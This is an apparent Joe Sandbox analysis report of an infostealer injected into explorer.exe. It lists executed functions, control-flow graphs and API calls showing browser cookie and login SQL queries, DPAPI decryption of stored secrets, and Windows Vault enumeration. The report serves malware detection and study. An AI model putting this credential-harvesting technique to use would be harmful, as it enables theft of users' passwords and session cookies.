c19e5 9 API calls 28214->28220 28216 c4205 wsprintfW 28217 c1011 3 API calls 28216->28217 28217->28220 28218 c1011 GetProcessHeap HeapFree VirtualQuery 28218->28220 28220->28213 28220->28214 28220->28218 28221 c17c0 9 API calls 28220->28221 28222 c1000 GetProcessHeap RtlAllocateHeap 28220->28222 28223 c1fce GetProcessHeap HeapFree VirtualQuery CryptUnprotectData RtlMoveMemory 28220->28223 28221->28220 28222->28216 28223->28220 28537 cebd9 24 API calls 28425 113dc8 24 API calls 28428 cc9ea _allmul _alldiv 28431 c99e1 strncmp 28432 cb1e3 23 API calls 28540 e7be1 29 API calls 28233 c47fa 28240 c479c 28233->28240 28236 c479c 23 API calls 28237 c4813 28236->28237 28238 c479c 23 API calls 28237->28238 28239 c481f 28238->28239 28241 c1afe 10 API calls 28240->28241 28242 c47af 28241->28242 28243 c47f1 28242->28243 28244 c199d 9 API calls 28242->28244 28243->28236 28245 c47bf 28244->28245 28246 c47ea 28245->28246 28248 c1d4a 18 API calls 28245->28248 28247 c1011 3 API calls 28246->28247 28247->28243 28248->28245 28433 1155eb IsProcessorFeaturePresent 28434 cd1f7 memset _allmul _allmul 28435 c49f1 13 API calls 28543 e13ca 62 API calls 28544 d9ff0 32 API calls

                                                      Executed Functions

                                                      Function 000C3717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 c3717-c3730 call c1b6a 3 c3736-c374c 0->3 4 c3c37-c3c3d 0->4 5 c374e-c3757 call c302d 3->5 6 c3762-c379c call c1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->6 9 c375c-c375e 5->9 11 c379e-c37a3 call c349b 6->11 12 c37a8-c37b5 call 114bec 6->12 9->6 11->12 16 c37bb-c37d3 call feeb8 12->16 17 c3c15-c3c1e DeleteFileW call c1011 12->17 22 c3c0c-c3c10 call 113848 16->22 23 c37d9-c37f1 call c1000 call e02ec 16->23 21 c3c23-c3c28 17->21 21->4 24 c3c2a-c3c32 call c2ffa 21->24 22->17 31 c37f7 23->31 32 c3bd0-c3be3 call dfb92 lstrlen 23->32 24->4 34 c37fc-c3816 call c1fa7 31->34 37 c3c05-c3c07 call c1011 32->37 38 c3be5-c3c00 call c1798 * 3 32->38 41 c381c-c382d 34->41 42 c3bb6-c3bc6 call e02ec 34->42 37->22 38->37 46 c3a37-c3a51 CryptUnprotectData 41->46 47 c3833-c3843 RtlCompareMemory 41->47 42->34 52 c3bcc 42->52 46->42 49 c3a57-c3a5c 46->49 47->46 51 c3849-c384b 47->51 49->42 53 c3a62-c3a78 call c1fa7 49->53 51->46 55 c3851-c3856 51->55 52->32 62 c3a7a-c3a80 53->62 63 c3a86-c3a9d call c1fa7 53->63 55->46 56 c385c-c3861 55->56 56->46 59 c3867-c38ed RtlZeroMemory call c1000 56->59 73 c3a2e-c3a32 59->73 74 c38f3-c3909 call c1fa7 59->74 62->63 66 c3a82 62->66 68 c3a9f-c3aa5 63->68 69 c3aab-c3ac2 call c1fa7 63->69 66->63 68->69 71 c3aa7 68->71 79 c3ac4-c3aca 69->79 80 c3ad0-c3aed call c1fa7 69->80 71->69 77 c3bb1 call c1011 73->77 83 c390b-c3911 74->83 84 c3917-c392d call c1fa7 74->84 77->42 79->80 82 c3acc 79->82 90 c3aef-c3af1 80->90 91 c3af7-c3b01 80->91 82->80 83->84 86 c3913 83->86 94 c392f-c3935 84->94 95 c393b-c3952 call c1fa7 84->95 86->84 90->91 96 c3af3 90->96 92 c3b0f-c3b1b lstrlen 91->92 93 c3b03-c3b05 91->93 92->42 99 c3b21-c3b2a lstrlen 92->99 93->92 97 c3b07-c3b0b 93->97 94->95 100 c3937 94->100 103 c3954-c395a 95->103 104 c3960-c3979 call c1fa7 95->104 96->91 97->92 99->42 102 c3b30-c3b4f call c1000 99->102 100->95 110 c3b59-c3b93 call c2112 wsprintfA lstrlen 102->110 111 c3b51 102->111 103->104 106 c395c 103->106 112 c397b-c3981 104->112 113 c3987-c3993 lstrlen 104->113 106->104 118 c3b95-c3ba1 call c102f 110->118 119 c3ba3-c3baf lstrcat 110->119 111->110 112->113 115 c3983 112->115 113->73 117 c3999-c39a2 lstrlen 113->117 115->113 117->73 120 c39a8-c39c7 call c1000 117->120 118->119 119->77 125 c39c9 120->125 126 c39d1-c3a0b call c2112 wsprintfA lstrlen 120->126 125->126 129 c3a0d-c3a19 call c102f 126->129 130 c3a1b-c3a29 lstrcat call c1011 126->130 129->130 130->73
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3778
                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3782
                                                      • DeleteFileW.KERNELBASE(00000000), ref: 000C3789
                                                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3794
                                                      • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 000C383B
                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 000C3870
                                                      • lstrlen.KERNEL32(?,?,?,?,?), ref: 000C398B
                                                      • lstrlen.KERNEL32(00000000), ref: 000C399A
                                                      • wsprintfA.USER32 ref: 000C39F1
                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 000C39FD
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C3A21
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3A49
                                                      • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000C3B13
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3B22
                                                      • wsprintfA.USER32 ref: 000C3B79
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3B85
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C3BA9
                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3BDA
                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C3C16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                      • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                      • API String ID: 584740257-404540950
                                                      • Opcode ID: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                      • Instruction ID: c2bd5664ae81c03ce275280e3603a140813cffa0008f9f19c02a5d8c1c7d7917
                                                      • Opcode Fuzzy Hash: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                      • Instruction Fuzzy Hash: 40E19870218341AFD725DF24C984FAFBBE9AF89344F04882CF585862A2DB76CD45CB52
                                                      Function 000C2198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 134 c2198-c21c9 RtlZeroMemory GetVersionExW 135 c21cb-c21d0 134->135 136 c21d7-c21dc 134->136 137 c21de 135->137 138 c21d2 135->138 136->137 139 c21e3-c21f6 LoadLibraryW 136->139 137->139 138->136 140 c21fc-c223e GetProcAddress * 5 139->140 141 c249b-c24a3 139->141 142 c2244-c224a 140->142 143 c2492-c249a FreeLibrary 140->143 142->143 144 c2250-c2252 142->144 143->141 144->143 145 c2258-c225a 144->145 145->143 146 c2260-c2265 145->146 146->143 147 c226b-c2277 146->147 148 c227e-c2280 147->148 148->143 149 c2286-c22a5 148->149 151 c248b-c248f 149->151 152 c22ab-c22b3 149->152 151->143 153 c22b9-c22c5 152->153 154 c2483 152->154 155 c22c9-c22db 153->155 154->151 156 c2365-c2375 RtlCompareMemory 155->156 157 c22e1-c22f1 RtlCompareMemory 155->157 158 c237b-c23c9 call c1953 * 3 156->158 159 c2452-c2475 156->159 157->159 160 c22f7-c2348 call c1953 * 3 157->160 176 c23cb-c23dc call c1953 158->176 177 c23e4-c23ea 158->177 159->155 163 c247b-c247f 159->163 160->177 178 c234e-c2363 call c1953 160->178 163->154 190 c23e0 176->190 181 c23ec-c23ee 177->181 182 c2431-c2433 177->182 178->190 187 c242a-c242c call c1011 181->187 188 c23f0-c23f2 181->188 184 c243c-c243e 182->184 185 c2435-c2437 call c1011 182->185 192 c2447-c2449 184->192 193 c2440-c2442 call c1011 184->193 185->184 187->182 188->187 194 c23f4-c23f6 188->194 190->177 192->159 197 c244b-c244d call c1011 192->197 193->192 194->187 196 c23f8-c2406 StrStrIW 194->196 198 c2408-c2421 call c17c0 * 3 196->198 199 c2426 196->199 197->159 198->199 199->187
                                                      APIs
                                                      • RtlZeroMemory.NTDLL(?,00000114), ref: 000C21AF
                                                      • GetVersionExW.KERNEL32(?), ref: 000C21BE
                                                      • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000C21E8
                                                      • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 000C220A
                                                      • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 000C2214
                                                      • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 000C2220
                                                      • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 000C222A
                                                      • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 000C2236
                                                      • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C22E8
                                                      • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C236C
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000C23FE
                                                      • FreeLibrary.KERNELBASE(00000000), ref: 000C2493
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                      • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                      • API String ID: 2583887280-2831467701
                                                      • Opcode ID: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                      • Instruction ID: 494c01f336fce24a4fdd702bd81126ed0909a159fbcac44f9df4693bfcb951b3
                                                      • Opcode Fuzzy Hash: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                      • Instruction Fuzzy Hash: 00919B71A083049FD718DF65C884FAFBBEAAF98304F00882DF98597252EB71D841CB52
                                                      Function 000C3098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 261 c3098-c30b1 call c1b6a 264 c33ba-c33c0 261->264 265 c30b7-c30cd 261->265 266 c30cf-c30d8 call c302d 265->266 267 c30e3-c3128 call c1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 114bec 265->267 270 c30dd-c30df 266->270 274 c312e-c3146 call feeb8 267->274 275 c339b-c33a4 DeleteFileW call c1011 267->275 270->267 281 c314c-c3158 call e02ec 274->281 282 c3392-c3396 call 113848 274->282 278 c33a9-c33ab 275->278 278->264 280 c33ad-c33b5 call c2ffa 278->280 280->264 287 c315e-c3161 281->287 288 c3389-c338d call dfb92 281->288 282->275 289 c3165-c317f call c1fa7 287->289 288->282 293 c336f-c337b call e02ec 289->293 294 c3185-c3196 289->294 293->289 303 c3381-c3385 293->303 295 c319c-c31ac RtlCompareMemory 294->295 296 c32cd-c32e7 CryptUnprotectData 294->296 295->296 299 c31b2-c31b4 295->299 296->293 298 c32ed-c32f2 296->298 298->293 301 c32f4-c330a call c1fa7 298->301 299->296 302 c31ba-c31bf 299->302 308 c330c-c3312 301->308 309 c3318-c332f call c1fa7 301->309 302->296 305 c31c5-c31ca 302->305 303->288 305->296 307 c31d0-c3253 RtlZeroMemory call c1000 305->307 319 c32bd 307->319 320 c3255-c326b call c1fa7 307->320 308->309 311 c3314 308->311 315 c333d-c3343 309->315 316 c3331-c3337 309->316 311->309 321 c3345-c334b 315->321 322 c3351-c336a call c1798 * 3 315->322 316->315 318 c3339 316->318 318->315 326 c32c1-c32c8 call c1011 319->326 330 c326d-c3273 320->330 331 c3279-c328e call c1fa7 320->331 321->322 323 c334d 321->323 322->293 323->322 326->293 330->331 334 c3275 330->334 339 c329c-c32bb call c1798 * 3 331->339 340 c3290-c3296 331->340 334->331 339->326 340->339 341 c3298 340->341 341->339
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C30F9
                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3103
                                                      • DeleteFileW.KERNELBASE(00000000), ref: 000C310A
                                                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3115
                                                      • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000C31A4
                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 000C31D7
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C32DF
                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C339C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                      • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                      • API String ID: 2757140130-4052020286
                                                      • Opcode ID: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                      • Instruction ID: 7d893e13d2ced862851d02a0f1a8131389b44376dc6ecc335188d734be133e5c
                                                      • Opcode Fuzzy Hash: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                      • Instruction Fuzzy Hash: C2919A31218381ABDB149F24C844FAFBBE9AFC5744F04892CF58596292DB35DE45CB52
                                                      Function 000C3ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 348 c3ed9-c3ee7 349 c3eed-c3ef1 348->349 350 c3fd1-c3fdb 348->350 349->350 351 c3ef7-c3f21 call c1000 PathCombineW FindFirstFileW 349->351 354 c3fca-c3fcc call c1011 351->354 355 c3f27-c3f30 351->355 354->350 356 c3f78-c3f86 lstrcmpiW 355->356 357 c3f32-c3f40 lstrcmpiW 355->357 359 c3faf-c3fbd FindNextFileW 356->359 360 c3f88-c3fa3 call c1000 PathCombineW call c3e04 356->360 357->359 361 c3f42-c3f54 lstrcmpiW 357->361 359->355 363 c3fc3-c3fc4 FindClose 359->363 369 c3fa8-c3faa call c1011 360->369 361->359 364 c3f56-c3f76 call c1000 PathCombineW call c3ed9 361->364 363->354 364->369 369->359
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000C3F0A
                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C3F16
                                                      • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C3F38
                                                      • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C3F4C
                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F69
                                                      • lstrcmpiW.KERNEL32(?,Local State), ref: 000C3F7E
                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F9B
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C3FB5
                                                      • FindClose.KERNELBASE(00000000), ref: 000C3FC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                      • String ID: *.*$Local State
                                                      • API String ID: 3923353463-3324723383
                                                      • Opcode ID: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                      • Instruction ID: 426f7e9a24056e881f0cc7fd89408b911b13c3a2952814074d4836fd1ca5a86e
                                                      • Opcode Fuzzy Hash: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                      • Instruction Fuzzy Hash: 6121B0306003447BD758AB709C48FEF76BC9BC6341F14893DF816C2193EBBA8A898661
                                                      Function 000C1D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 373 c1d4a-c1d5c 374 c1eb4-c1ebe 373->374 375 c1d62-c1d66 373->375 375->374 376 c1d6c-c1d77 call c19b4 375->376 379 c1d79-c1d89 call c1953 376->379 380 c1d8b-c1d97 call c1953 376->380 385 c1d9b-c1d9d 379->385 380->385 385->374 386 c1da3-c1db4 FindFirstFileW 385->386 387 c1ead-c1eaf call c1011 386->387 388 c1dba 386->388 387->374 390 c1dbe-c1dc3 388->390 391 c1e3d-c1e6a call c1953 call c199d lstrcmpiW 390->391 392 c1dc5-c1dd7 lstrcmpiW 390->392 405 c1e6c-c1e75 call c1cf7 391->405 406 c1e87-c1e89 call c1011 391->406 394 c1ddd-c1def lstrcmpiW 392->394 395 c1e8e-c1e9c FindNextFileW 392->395 394->395 398 c1df5-c1e00 call c19b4 394->398 395->390 396 c1ea2-c1ea9 FindClose 395->396 396->387 403 c1e09 398->403 404 c1e02-c1e07 398->404 408 c1e0b-c1e3b call c1953 call c199d call c1d4a 403->408 404->408 405->406 412 c1e77-c1e7f 405->412 406->395 408->406 412->406
                                                      APIs
                                                        • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C1DA9
                                                      • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C1DCF
                                                      • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C1DE7
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000C1E62
                                                        • Part of subcall function 000C1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2C27), ref: 000C1D02
                                                        • Part of subcall function 000C1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 000C1D0D
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C1E94
                                                      • FindClose.KERNELBASE(00000000), ref: 000C1EA3
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                      • String ID: *.*$\*.*
                                                      • API String ID: 232625764-1692270452
                                                      • Opcode ID: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                      • Instruction ID: 18202571e4568279dd00b231e5bad336ff062d80cfc7ef8d9098c242816cd79d
                                                      • Opcode Fuzzy Hash: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                      • Instruction Fuzzy Hash: A931A2307083419BDB64EB749998FEF76EA9FC6340F004A2DF84AC2253EB758C459652
                                                      Function 000C3E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 483 c3e04-c3e11 call c1b6a 486 c3ed4-c3ed8 483->486 487 c3e17-c3e22 call c1c31 483->487 487->486 490 c3e28-c3e34 call c2fb1 487->490 493 c3ec8-c3ecc 490->493 494 c3e3a-c3e4f call c123b 490->494 493->486 497 c3ec0-c3ec7 call c1011 494->497 498 c3e51-c3e58 494->498 497->493 499 c3ebf 498->499 500 c3e5a-c3e6a 498->500 499->497 502 c3e6c-c3e7c RtlCompareMemory 500->502 503 c3eb8-c3eba call c1011 500->503 502->503 505 c3e7e-c3ea6 CryptUnprotectData 502->505 503->499 505->503 507 c3ea8-c3ead 505->507 507->503 508 c3eaf-c3eb3 507->508 508->503
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • Part of subcall function 000C1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                        • Part of subcall function 000C1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                        • Part of subcall function 000C1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                        • Part of subcall function 000C1C31: CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                        • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                        • Part of subcall function 000C2FB1: lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                        • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                        • Part of subcall function 000C123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000C3E4B,00000000), ref: 000C124A
                                                        • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1268
                                                        • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1295
                                                      • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 000C3E74
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3E9E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                      • String ID: $DPAP$DPAP$IDPAP
                                                      • API String ID: 3076719866-957854035
                                                      • Opcode ID: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                      • Instruction ID: 1247902a791fece0136aa602f9ff097b9321c40bf4286bc784f5f2b7437e54bc
                                                      • Opcode Fuzzy Hash: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                      • Instruction Fuzzy Hash: 9D2181726143456BD725EB688C80FFFB2EDAB95700F44492DF841C7282EB74CE498796
                                                      Function 00129247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 665 129247-129275 666 1292e1-1292eb 665->666 667 129277-1292a3 665->667 668 12930e-129342 666->668 669 1292ed-1292f8 666->669 670 1292a5-1292a7 667->670 671 1292aa-1292be 667->671 672 129344-129346 668->672 673 129238-129245 670->673 674 1292a9 670->674 675 129381-1293a5 672->675 676 129349-12934c 672->676 673->665 674->671 678 1293ab-1293b8 675->678 679 12958d 675->679 676->672 677 12934e-12937a 676->677 680 1293e1 677->680 681 12937c 677->681 682 1293ca-1293cf 678->682 679->679 683 1293e3-1293e7 680->683 681->675 684 1293d1 682->684 685 1293f4-1293f7 683->685 686 1293e9 683->686 687 1293d3 684->687 688 1293c0-1293c5 684->688 691 129400-129402 685->691 692 1293f9-1293fe 685->692 689 129413-129418 686->689 690 1293eb-1293f2 686->690 694 1293d8-1293da 687->694 693 1293c6-1293c8 688->693 695 12941a-129423 689->695 696 12942b-12942d 689->696 690->685 690->689 691->694 692->691 693->682 693->684 694->683 697 1293dc-1293de 694->697 698 129425-129429 695->698 699 12949a-12949d 695->699 700 129436 696->700 701 12942f-129434 696->701 697->680 698->700 702 1294a2-1294a5 699->702 703 129404-129406 700->703 704 129438-12943b 700->704 701->700 709 1294a7-1294a9 702->709 707 129408-12940d 703->707 708 12940f-129411 703->708 705 129444 704->705 706 12943d-129442 704->706 705->703 711 129446-129448 705->711 706->705 707->708 712 129465-129474 708->712 709->702 710 1294ab-1294ae 709->710 710->702 713 1294b0-1294cc 710->713 714 129451-129455 711->714 715 12944a-12944f 711->715 716 129476-12947d 712->716 717 129484-129491 712->717 713->709 718 1294ce 713->718 714->711 719 129457 714->719 715->714 716->716 720 12947f 716->720 717->717 721 129493-129495 717->721 722 1294d4-1294d8 718->722 723 129462 719->723 724 129459-129460 719->724 720->693 721->693 725 1294da-1294f0 LoadLibraryA 722->725 726 12951f-129522 722->726 723->712 724->711 724->723 727 1294f1-1294f6 725->727 728 129525-12952c 726->728 727->722 729 1294f8-1294fa 727->729 730 129550-129580 VirtualProtect * 2 728->730 731 12952e-129530 728->731 733 129503-129510 GetProcAddress 729->733 734 1294fc-129502 729->734 732 129584-129588 730->732 735 129532-129541 731->735 736 129543-12954e 731->736 732->732 737 12958a 732->737 738 129512-129517 733->738 739 129519-12951c 733->739 734->733 735->728 736->735 737->679 738->727
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.0000000000127000.00000040.80000000.00040000.00000000.sdmp, Offset: 00127000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_127000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                      • Instruction ID: f8f956276b81556480b3c1b19405860d93c04e5a3b5c81f61446289dd2956c78
                                                      • Opcode Fuzzy Hash: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                      • Instruction Fuzzy Hash: 6BA15AB2A143A25FDB259E7CEDD06A07BA0FB52324F2D066DC5D1CB2C2E7605817C751
                                                      Function 000C4B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 000C116F
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C4BB6
                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 000C4BBF
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
